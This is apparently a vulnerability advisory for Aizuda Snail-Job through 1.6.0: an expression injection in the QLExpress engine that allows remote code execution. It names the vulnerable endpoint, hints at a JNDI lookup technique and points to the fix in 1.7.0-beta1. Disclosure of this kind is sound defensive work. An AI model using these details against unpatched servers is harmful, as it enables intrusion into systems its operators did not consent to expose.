Aizuda Snail-Job Expression Injection Vulnerability in QLExpress Engine Allowing Remote Code Execution

An expression injection vulnerability has been identified in Aizuda Snail-Job versions through 1.6.0. The issue arises in the QLExpressEngine.doEval function, where user-controlled expressions are parsed without adequate security measures. This flaw allows remote attackers to inject expressions that the server evaluates using QLExpress, potentially leading to unauthorized code execution.

Impact

Exploitation of this vulnerability allows for remote code execution on the server where Snail-Job is running.

Reproduction

To reproduce this vulnerability, send a request to the '/workflow/check-node-expression' endpoint with a payload that includes a malicious expression. The QLExpress engine will execute the injected expression, bypassing default security restrictions. For example, an expression could be crafted to use 'javax.naming.InitialContext.doLookup' to perform a lookup that could lead to code execution.

Remediation

Upgrade to Aizuda Snail-Job version 1.7.0-beta1, which addresses this vulnerability by adding necessary security restrictions. The patched version is available on Gitee.